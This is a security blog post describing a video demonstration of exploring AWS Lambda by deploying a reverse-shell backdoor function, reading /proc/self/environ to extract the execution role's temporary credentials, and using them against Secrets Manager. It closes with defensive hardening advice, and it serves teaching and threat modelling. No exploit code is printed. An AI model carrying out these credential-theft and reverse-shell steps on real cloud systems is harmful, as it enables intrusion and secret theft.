Cloud Security - Exploring the AWS Lambda runtime execution environment

Serverless computing has been gaining popularity especially in the cloud. While the service provides much convenience for most users who have no access to the underlying environment, hackers are interested in understanding how things work behind the scene, and we want to answer some basic cybersecurity questions. For instance, what is the software used, including operating system and middleware, in the application stack? Where does the service store credentials in the environment? And most importantly, how can a serverless deployment be hacked or leveraged in an attack if ever possible?

In the following video demonstration, we try to explore the AWS Lambda runtime execution environment, which is used in lots of use cases from developing application APIs to configuring cloud resources. A malicious Lambda reverse shell backdoor function is written and deployed allowing us to explore the runtime execution environment interactively -

https://www.youtube.com/watch?v=khF1PMjQv_E&t=10s

The scenario starts with an attempt to access some secrets secured in AWS Secrets Manager. Since we do not have valid credentials, the attempt fails. However, if we can identify another AWS resource that is allowed to access the secrets, we can leverage that to achieve our goal. In this case, we look at AWS Lambda as a proof of concept. First we write a NodeJS reverse shell function and deploy it onto AWS Lambda via AWS SAM, which generates CloudFormation stack for our Lambda function that will be deployed together with our API Gateway. Then we invoke our backdoor via the API Gateway by a simple curl, and our backdoor will connect back to our Linux machine listening on netcat. We can then explore the environment and we quickly pull out some basic details, because the process will timeout quickly, though we can configure a longer timeout in our template, but still limited. Although the timeout may be a limitation, we can always re-invoke the function again and again. Here we have something, as an example, like CPU info, operating system, NodeJS version. We also list the current directory and identify the user, which is generated by AWS service. But most importantly, back to our question, where can we find the security credentials used by the service? Not many options, right? Make a guess. Bingo! It's in the environment variables. Let's cat /proc/self/environ and the temporary AWS access key (the one starting with "ASIA...." issued by STS) and session token of the Lambda execution role can be retrieved. With the stolen credentials we can try to access Secrets Manager again, provided the role has the required permissions. The environment is actually quite restrictive, but we still manage to write to the /tmp directory, and as a proof of concept, we create another reverse shell to connect back to us on a different port.

Apart from stealing the AWS credentials, sometimes you may discover application credentials in various places by examining the file system and environment. Where do developers like to put their application passwords and keys? Hardcoded in source code? In config files? Also in environment variables? Or in password vaults / Secrets Manager? You name it.

This is just an experiment that allows us to explore the serverless computing environment, but how can an attacker inject or deploy the malicious code in the first place in a practical attack scenario? Well, there are many possibilities, it can be a coding or open source software bug like insecure deserialization, dynamic code evaluation, or any kind of code injection flaw in the serverless function, or a supply chain attack, or a compromised development workstation, a compromised repository for code deploy, or a compromised build machine....

Similar techniques can be employed on other cloud service providers as well. For example, you can create a reverse shell in Go for Google Cloud Functions running Go runtime on Ubuntu, and try to go after IMDS, or make a version for Azure running .Net on Debian, and follow the Managed Service Identity endpoint.

Finally, best practice again, same as our previous cyber attack illustrations, wear the attacker's hat and threat model your serverless deployment even you may think you do not need to care much about the underlying environment. Maintain security hygiene, limit access and setup monitoring for threat detection, robust logging and monitoring can also facilitate threat hunting as an additional layer of defence. Taking AWS as an example, you should configure VPC and Security Groups for your serverless deployment, limiting to private subnets, configure egress rules to filter traffic by ports and CIDR / IP range, enable VPC flow log and setup CloudWatch monitoring for rejected traffic. Configure VPC endpoints for services like S3, and setup resource policies to limit access originated from the Lambda VPC.

My Youtube channel - https://www.youtube.com/channel/UCXSZyDvr7tpT62t3XvdCc3w

Popular posts from this blog

AirGap Hacking - Malware infiltration via USB HID driver and data exfiltration via near ultrasound

Cloud Security - Stealing temporary AWS access key via SSRF to access S3

Mobile Security - TV interview and demo